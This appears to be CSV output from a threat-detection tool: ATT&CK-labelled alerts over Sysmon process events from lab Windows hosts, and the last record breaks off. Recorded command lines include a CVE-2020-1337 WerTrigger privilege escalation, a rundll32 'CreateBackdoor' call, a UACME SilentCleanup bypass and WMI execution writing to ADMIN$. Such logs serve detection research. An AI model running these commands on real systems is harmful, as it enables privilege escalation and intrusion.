+ + + 342412 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-08-12 13:06:01.636 + 747F3D96-E939-5F33-0000-0010ACAB0E00 + 7852 + C:\Windows\System32\cmd.exe + 10.0.17763.592 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + Cmd.Exe + C:\Windows\system32\cmd.exe /c mkdir,C:\ProgramData\Microsoft\Windows\WER\ReportQueue\a_b_c_d_e + C:\Users\Public\tools\PrivEsc\cve-2020-1337-poc-master\ + MSEDGEWIN10\IEUser + 747F3D96-E911-5F33-0000-0020241C0400 + 0x41c24 + 1 + Medium + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-E938-5F33-0000-00109CA00E00 + 7820 + C:\Users\Public\tools\PrivEsc\cve-2020-1337-poc-master\WerTrigger.exe + WerTrigger.exe + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +Detect IIS/Exchange Exploitation,1558885676.667118,2019-05-26T19:47:56.667118+04:00,,Threat,Critical,IIS run command with user (IIS APPPOOL\DefaultAppPool) and process name (C:\Windows\System32\notepad.exe) and commandline ( C:\Windows\System32\notepad.exe ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5408 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-26 15:47:56.627 + 365ABB72-B52C-5CEA-0000-00107A0D1100 + 3388 + C:\Windows\System32\notepad.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Notepad + Microsoft® Windows® Operating System + Microsoft Corporation + C:\Windows\System32\notepad.exe + c:\windows\system32\inetsrv\ + IIS APPPOOL\DefaultAppPool + 365ABB72-B26B-5CEA-0000-002023240800 + 0x82423 + 0 + High + SHA1=FC64B1EF19E7F35642B2A2EA5F5D9F4246866243,MD5=A4F6DF0E33E644E802C8798ED94D80EA,SHA256=B56AFE7165AD341A749D2D3BD925D879728A1FE4A4DF206145C1A69AA233F68B,IMPHASH=53A6715F589E88C4FD4541C81B4F57C3 + 365ABB72-B26B-5CEA-0000-0010582A0800 + 2744 + C:\Windows\System32\inetsrv\w3wp.exe + c:\windows\system32\inetsrv\w3wp.exe -ap "DefaultAppPool" -v "v2.0" -l "webengine4.dll" -a \\.\pipe\iisipmb9da32d5-aa43-42fc-aeea-0cc226e10973 -h "C:\inetpub\temp\apppools\DefaultAppPool\DefaultAppPool.config" -w "" -m 0 -t 20 + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1579034897.447948,2020-01-15T00:48:17.447948+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "cmd.exe" /c notepad.exe ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 345 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-01-14 20:48:17.270 + 747F3D96-2911-5E1E-0000-0010D80A7D00 + 2416 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + Cmd.Exe + "cmd.exe" /c notepad.exe + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-2910-5E1E-0000-002082EF7C00 + 0x7cef82 + 0 + High + SHA1=08CC2E8DCA652BDDA1ACCA9C446560D4BC1BCDF9,MD5=0D088F5BCFA8F086FBA163647CD80CAB,SHA256=9023F8AAEDA4A1DA45AC477A81B5BBE4128E413F19A0ABFA3715465AD66ED5CD,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-2910-5E1E-0000-001053F57C00 + 4448 + C:\Windows\System32\cmd.exe + cmd.exe /c start ms-browser:// + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1564909835.391457,2019-08-04T13:10:35.391457+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5703 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-08-04 09:10:30.702 + 747F3D96-A106-5D46-0000-00102425BD03 + 6604 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-56A3-5D45-0000-0020B3D31800 + 0x18d3b3 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-A106-5D46-0000-00107201BD03 + 1380 + C:\Windows\System32\control.exe + "C:\Windows\System32\control.exe" /name Microsoft.BackupAndRestoreCenter + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1597237562.552084,2020-08-12T17:06:02.552084+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( C:\Windows\system32\cmd.exe /c rmdir /s/q C:\ProgramData\Microsoft\Windows\WER\ReportQueue\a_b_c_d_e > nul 2>&1 ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 342411 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-08-12 13:06:00.734 + 747F3D96-E938-5F33-0000-00101CA50E00 + 7836 + C:\Windows\System32\cmd.exe + 10.0.17763.592 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + Cmd.Exe + C:\Windows\system32\cmd.exe /c rmdir /s/q C:\ProgramData\Microsoft\Windows\WER\ReportQueue\a_b_c_d_e > nul 2>&1 + C:\Users\Public\tools\PrivEsc\cve-2020-1337-poc-master\ + MSEDGEWIN10\IEUser + 747F3D96-E911-5F33-0000-0020241C0400 + 0x41c24 + 1 + Medium + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-E938-5F33-0000-00109CA00E00 + 7820 + C:\Users\Public\tools\PrivEsc\cve-2020-1337-poc-master\WerTrigger.exe + WerTrigger.exe + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1579034897.412145,2020-01-15T00:48:17.412145+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /c start ms-browser:// ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 344 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-01-14 20:48:16.990 + 747F3D96-2910-5E1E-0000-001053F57C00 + 4448 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + Cmd.Exe + cmd.exe /c start ms-browser:// + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-2910-5E1E-0000-002082EF7C00 + 0x7cef82 + 0 + High + SHA1=08CC2E8DCA652BDDA1ACCA9C446560D4BC1BCDF9,MD5=0D088F5BCFA8F086FBA163647CD80CAB,SHA256=9023F8AAEDA4A1DA45AC477A81B5BBE4128E413F19A0ABFA3715465AD66ED5CD,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-2910-5E1E-0000-0010F5F07C00 + 4612 + C:\Windows\System32\wbem\WmiPrvSE.exe + C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1047] Windows Management Instrumentation - Process,1579034897.412145,2020-01-15T00:48:17.412145+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /c start ms-browser:// ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 344 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-01-14 20:48:16.990 + 747F3D96-2910-5E1E-0000-001053F57C00 + 4448 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + Cmd.Exe + cmd.exe /c start ms-browser:// + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-2910-5E1E-0000-002082EF7C00 + 0x7cef82 + 0 + High + SHA1=08CC2E8DCA652BDDA1ACCA9C446560D4BC1BCDF9,MD5=0D088F5BCFA8F086FBA163647CD80CAB,SHA256=9023F8AAEDA4A1DA45AC477A81B5BBE4128E413F19A0ABFA3715465AD66ED5CD,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-2910-5E1E-0000-0010F5F07C00 + 4612 + C:\Windows\System32\wbem\WmiPrvSE.exe + C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1047] Windows Management Instrumentation - Instances of an Active Script Event Consumer - Process,1579034897.412145,2020-01-15T00:48:17.412145+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /c start ms-browser:// ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 344 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-01-14 20:48:16.990 + 747F3D96-2910-5E1E-0000-001053F57C00 + 4448 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + Cmd.Exe + cmd.exe /c start ms-browser:// + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-2910-5E1E-0000-002082EF7C00 + 0x7cef82 + 0 + High + SHA1=08CC2E8DCA652BDDA1ACCA9C446560D4BC1BCDF9,MD5=0D088F5BCFA8F086FBA163647CD80CAB,SHA256=9023F8AAEDA4A1DA45AC477A81B5BBE4128E413F19A0ABFA3715465AD66ED5CD,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-2910-5E1E-0000-0010F5F07C00 + 4612 + C:\Windows\System32\wbem\WmiPrvSE.exe + C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1557970296.456891,2019-05-16T05:31:36.456891+04:00,,Threat,Low,Found User (insecurebank\Administrator) running image ( C:\Windows\System32\cmd.exe ) through command line ( C:\Windows\system32\cmd.exe /C ipconfig ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 17985 + + + + + Microsoft-Windows-Sysmon/Operational + DC1.insecurebank.local + + + + + + 2019-05-16 01:31:36.443 + DFAE8213-BD78-5CDC-0000-001091041300 + 3136 + C:\Windows\System32\cmd.exe + 6.3.9600.16384 (winblue_rtm.130821-1623) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + C:\Windows\system32\cmd.exe /C ipconfig + C:\Users\administrator\ + insecurebank\Administrator + DFAE8213-BD78-5CDC-0000-002005FE1200 + 0x12fe05 + 0 + High + SHA1=7C3D7281E1151FE4127923F4B4C3CD36438E1A12,MD5=F5AE03DE0AD60F5B17B82F2CD68402FE,SHA256=6F88FB88FFB0F1D5465C2826E5B4F523598B1B8378377C8378FFEBC171BAD18B,IMPHASH=77AED1ADAF24B344F08C8AD1432908C3 + DFAE8213-BD78-5CDC-0000-0010C7FE1200 + 3948 + C:\Windows\System32\winrshost.exe + C:\Windows\system32\WinrsHost.exe -Embedding + +",DC1.insecurebank.local,Microsoft-Windows-Sysmon/Operational +[T1082] System Information Discovery,1556571562.144046,2019-04-30T00:59:22.144046+04:00,,Threat,Critical,System Information Discovery Process ( C:\Windows\System32\whoami.exe) ith commandline ( "C:\Windows\system32\whoami.exe" /all) ,1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 8050 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-04-29 20:59:22.128 + 365ABB72-65AA-5CC7-0000-00104D882400 + 2116 + C:\Windows\System32\whoami.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + whoami - displays logged on user information + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\whoami.exe" /all + C:\Users\IEUser\Documents\ + IEWIN7\IEUser + 365ABB72-5B3A-5CC7-0000-002096080100 + 0x10896 + 1 + High + SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274 + 365ABB72-65A9-5CC7-0000-00104E5C2400 + 3376 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[ T0000 ] Suspicious process name detected,1556571562.144046,2019-04-30T00:59:22.144046+04:00,,Threat,High,User Name : ( IEWIN7\IEUser ) with Command Line : ( "C:\Windows\system32\whoami.exe" /all ) contain suspicious command ( whoami.exe),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 8050 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-04-29 20:59:22.128 + 365ABB72-65AA-5CC7-0000-00104D882400 + 2116 + C:\Windows\System32\whoami.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + whoami - displays logged on user information + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\whoami.exe" /all + C:\Users\IEUser\Documents\ + IEWIN7\IEUser + 365ABB72-5B3A-5CC7-0000-002096080100 + 0x10896 + 1 + High + SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274 + 365ABB72-65A9-5CC7-0000-00104E5C2400 + 3376 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +Command run remotely Using WMI,1603490254.745175,2020-10-24T01:57:34.745175+04:00,,Threat,Critical,User (NT AUTHORITY\NETWORK SERVICE) run command through WMI with process (C:\Windows\System32\wbem\WmiPrvSE.exe) and commandline ( C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 423991 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-10-23 21:57:29.192 + 747F3D96-51C9-5F93-0000-001010175B00 + 8796 + C:\Windows\System32\wbem\WmiPrvSE.exe + 10.0.17763.1 (WinBuild.160101.0800) + WMI Provider Host + Microsoft® Windows® Operating System + Microsoft Corporation + Wmiprvse.exe + C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding + C:\Windows\system32\ + NT AUTHORITY\NETWORK SERVICE + 747F3D96-C50A-5F93-0000-0020E4030000 + 0x3e4 + 0 + System + SHA1=67C25C8F28B5FA7F5BAA85BF1D2726AED48E9CF0,MD5=06C66FF5CCDC2D22344A3EB761A4D38A,SHA256=B5C78BEF3883E3099F7EF844DA1446DB29107E5C0223B97F29E7FAFAB5527F15,IMPHASH=CFECEDC01015A4FD1BAACAC9E592D88B + 00000000-0000-0000-0000-000000000000 + 836 + ? + ? + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1117] Bypassing Application Whitelisting,1584766825.569133,2020-03-21T09:00:25.569133+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor)",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 243565 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-03-21 05:00:25.544 + 747F3D96-9F69-5E75-0000-0010729F2000 + 3536 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32 windowscoredeviceinfo.dll,CreateBackdoor + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-9DBA-5E75-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-9DBC-5E75-0000-00102C390100 + 1652 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1584766825.569133,2020-03-21T09:00:25.569133+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 243565 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-03-21 05:00:25.544 + 747F3D96-9F69-5E75-0000-0010729F2000 + 3536 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32 windowscoredeviceinfo.dll,CreateBackdoor + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-9DBA-5E75-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-9DBC-5E75-0000-00102C390100 + 1652 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1597237560.737148,2020-08-12T17:06:00.737148+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( C:\Windows\system32\cmd.exe /c reg query "HKLM\Software\WOW6432Node\Npcap" /ve 2>nul | find "REG_SZ" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 342409 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-08-12 13:05:38.149 + 747F3D96-E922-5F33-0000-00107A2B0B00 + 6952 + C:\Windows\System32\cmd.exe + 10.0.17763.592 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + Cmd.Exe + C:\Windows\system32\cmd.exe /c reg query "HKLM\Software\WOW6432Node\Npcap" /ve 2>nul | find "REG_SZ" + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-E909-5F33-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-E90A-5F33-0000-0010863C0100 + 1740 + C:\Windows\System32\cmd.exe + C:\Windows\SYSTEM32\cmd.exe /c ""C:\Program Files\Npcap\CheckStatus.bat"" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1564825609.436856,2019-08-03T13:46:49.436856+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe"\system32\cleanmgr.exe /autoclean /d C: ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5134 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-08-03 09:46:49.331 + 747F3D96-5809-5D45-0000-00100B233F00 + 1380 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe"\system32\cleanmgr.exe /autoclean /d C: + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-56A3-5D45-0000-0020B3D31800 + 0x18d3b3 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D4EA-5D45-0000-00105CD60000 + 1072 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1085] Rundll32 Execution detected,1584766825.569133,2020-03-21T09:00:25.569133+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 243565 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-03-21 05:00:25.544 + 747F3D96-9F69-5E75-0000-0010729F2000 + 3536 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32 windowscoredeviceinfo.dll,CreateBackdoor + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-9DBA-5E75-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-9DBC-5E75-0000-00102C390100 + 1652 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1082] System Information Discovery,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Critical,System Information Discovery Process ( C:\Windows\System32\whoami.exe) ith commandline ( whoami /all ) ,1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 9840 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-04-30 20:35:13.527 + 365ABB72-B181-5CC8-0000-00108DC71E00 + 692 + C:\Windows\System32\whoami.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + whoami - displays logged on user information + Microsoft® Windows® Operating System + Microsoft Corporation + whoami /all + C:\ + IEWIN7\IEUser + 365ABB72-B17F-5CC8-0000-0020C6A31E00 + 0x1ea3c6 + 0 + High + SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274 + 365ABB72-B181-5CC8-0000-001023C41E00 + 1256 + C:\Windows\System32\cmd.exe + "C:\Windows\System32\cmd.exe" /Q /c whoami /all 1> \\127.0.0.1\ADMIN$\__1556656511.61 2>&1 + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +Command run remotely Using WMI,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Critical,User (NT AUTHORITY\NETWORK SERVICE) run command through WMI with process (C:\Windows\System32\wbem\WmiPrvSE.exe) and commandline ( C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 422746 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-10-20 22:35:26.747 + 747F3D96-662E-5F8F-0000-001023353800 + 6748 + C:\Windows\System32\wbem\WmiPrvSE.exe + 10.0.17763.1 (WinBuild.160101.0800) + WMI Provider Host + Microsoft® Windows® Operating System + Microsoft Corporation + Wmiprvse.exe + C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding + C:\Windows\system32\ + NT AUTHORITY\NETWORK SERVICE + 747F3D96-E130-5F8F-0000-0020E4030000 + 0x3e4 + 0 + System + SHA1=67C25C8F28B5FA7F5BAA85BF1D2726AED48E9CF0,MD5=06C66FF5CCDC2D22344A3EB761A4D38A,SHA256=B5C78BEF3883E3099F7EF844DA1446DB29107E5C0223B97F29E7FAFAB5527F15,IMPHASH=CFECEDC01015A4FD1BAACAC9E592D88B + 00000000-0000-0000-0000-000000000000 + 840 + ? + ? + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1597237545.570757,2020-08-12T17:05:45.570757+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 342408 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-08-12 13:05:36.545 + 747F3D96-E920-5F33-0000-001043920A00 + 5128 + C:\Windows\System32\cmd.exe + 10.0.17763.592 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + Cmd.Exe + "C:\Windows\system32\cmd.exe" + C:\Users\IEUser\ + MSEDGEWIN10\IEUser + 747F3D96-E911-5F33-0000-0020241C0400 + 0x41c24 + 1 + Medium + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-E914-5F33-0000-001009990500 + 5144 + C:\Windows\explorer.exe + C:\Windows\Explorer.EXE + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1053] Scheduled Task - Process,1564825609.40255,2019-08-03T13:46:49.402550+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\schtasks.exe ) through command line ( "C:\Windows\System32\schtasks.exe" /run /tn "\Microsoft\Windows\DiskCleanup\SilentCleanup" /i ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5133 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + Persistence - Scheduled Task Management + 2019-08-03 09:46:48.842 + 747F3D96-5808-5D45-0000-0010D1FE3E00 + 1268 + C:\Windows\System32\schtasks.exe + 10.0.17763.1 (WinBuild.160101.0800) + Task Scheduler Configuration Tool + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\System32\schtasks.exe" /run /tn "\Microsoft\Windows\DiskCleanup\SilentCleanup" /i + C:\Users\IEUser\Desktop\ + MSEDGEWIN10\IEUser + 747F3D96-56A3-5D45-0000-0020FBD31800 + 0x18d3fb + 1 + Medium + SHA1=112C8FFA1C0934ACAAD2C58B3C7E81F3FB8E4A2C,MD5=3F9FD6D3B3E96B8F576DB72035DB38A7,SHA256=D6BA2CD73799477C051D9D864C47FCF5108064CDE07D3565871AFA10FC548086,IMPHASH=7EE4BC5589713B3470B8A950256E2E69 + 747F3D96-5808-5D45-0000-00106CDC3E00 + 924 + C:\Users\IEUser\Desktop\UACME.exe + UACME.exe 34 + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1556656513.543589,2019-05-01T00:35:13.543589+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\System32\cmd.exe" /Q /c whoami /all 1> \\127.0.0.1\ADMIN$\__1556656511.61 2>&1 ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 9839 + + + + + Microsoft-Windows-Sysmon/Operational + 